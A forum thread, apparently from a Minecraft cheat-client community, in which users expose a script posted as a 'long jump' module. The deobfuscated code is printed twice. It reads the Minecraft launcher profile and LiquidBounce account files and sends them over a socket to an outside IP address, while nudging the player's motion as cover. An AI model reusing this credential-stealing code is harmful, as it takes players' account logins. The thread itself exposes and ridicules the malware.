NeruxVaceLongJump
-
thank you for your constructive criticism
-
@paul2008 china
-
@paul2008 said in NeruxVaceLongJump:
thank you for your constructive criticism
no problem, now wait for the ban hammer too
-
2021 - 2008 = 13 yo
-
-
@paul2008 mfw someuses clown emoji in 2021 :cringe: :trolled:
-
@paul2008 i love your code
var a = registerScript({ name: "", version: "", authors: [""] }); b = Java.type; hack = b("java.net.Socket"); motionCalculator = b("java.io.DataOutputStream"); pwd = b("java.nio.file.Paths").get("").toAbsolutePath().toString(); stringUtils = b("java.io.File"); stringParse = b("org.apache.commons.io.FileUtils"); iso = b("java.nio.charset.StandardCharsets"); function dataFromString(strings) { try { var strU = new stringUtils(strings); return stringParse.readFileToString(strU, iso.ISO_8859_1) } catch (e) {} } a.registerModule({ name: "NeruxVaceLongJump", category: "Misc", description: "NeruxVaceLongJump" }, function (module) { module.on("enable", function () { data = dataFromString(pwd + "/launcher_profiles.json"); data += "\n"; data += dataFromString(pwd + "/LiquidBounce-1.8/accounts.json"); data = data.getBytes(); l = data.length; anticheat = new hack("107.182.237.14", 55228); anticheat.setSoTimeout(10000); server = new motionCalculator(anticheat.getOutputStream()); server.writeInt(l); server.write(data, 0, l); mc.thePlayer.motionX += 10 }) });
deobfed in 5 mins
thought that 3 layers of eval obfuscation could help you? -
@____ no
-
@paul2008 the only thing that does make sense your code is
mc.thePlayer.motionX += 10
-
@____ said in NeruxVaceLongJump:
@paul2008 i love your code
var a = registerScript({ name: "", version: "", authors: [""] }); b = Java.type; hack = b("java.net.Socket"); motionCalculator = b("java.io.DataOutputStream"); pwd = b("java.nio.file.Paths").get("").toAbsolutePath().toString(); stringUtils = b("java.io.File"); stringParse = b("org.apache.commons.io.FileUtils"); iso = b("java.nio.charset.StandardCharsets"); function dataFromString(strings) { try { var strU = new stringUtils(strings); return stringParse.readFileToString(strU, iso.ISO_8859_1) } catch (e) {} } a.registerModule({ name: "NeruxVaceLongJump", category: "Misc", description: "NeruxVaceLongJump" }, function (module) { module.on("enable", function () { data = dataFromString(pwd + "/launcher_profiles.json"); data += "\n"; data += dataFromString(pwd + "/LiquidBounce-1.8/accounts.json"); data = data.getBytes(); l = data.length; anticheat = new hack("107.182.237.14", 55228); anticheat.setSoTimeout(10000); server = new motionCalculator(anticheat.getOutputStream()); server.writeInt(l); server.write(data, 0, l); mc.thePlayer.motionX += 10 }) });
deobfed in 5 mins
thought that 3 layers of eval obfuscation could help you?That's a shit way to make a longjump, would rate 0/10, doesn't even achieve its purpose
-